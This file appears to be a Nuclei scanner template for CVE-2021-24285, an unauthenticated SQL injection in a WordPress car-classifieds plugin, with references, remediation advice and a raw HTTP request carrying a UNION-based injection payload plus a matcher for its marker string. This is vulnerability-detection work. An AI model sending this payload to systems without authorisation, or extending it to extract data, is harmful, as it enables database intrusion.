nuclei-templates/http/cves/2021/CVE-2021-24285.yaml

48 lines
2.1 KiB
YAML
Raw Normal View History

2021-06-08 21:43:23 +00:00
id: CVE-2021-24285
info:
name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
2021-06-08 21:43:23 +00:00
author: ShreyaPohekar
severity: critical
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.
reference:
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
- https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24285
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.12049
epss-percentile: 0.94624
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: cars-seller-auto-classifieds-script_project
product: cars-seller-auto-classifieds-script
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-07-11 19:49:27 +00:00
tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve
2021-06-08 21:43:23 +00:00
http:
2021-06-08 21:43:23 +00:00
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-06-08 21:43:23 +00:00
words:
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200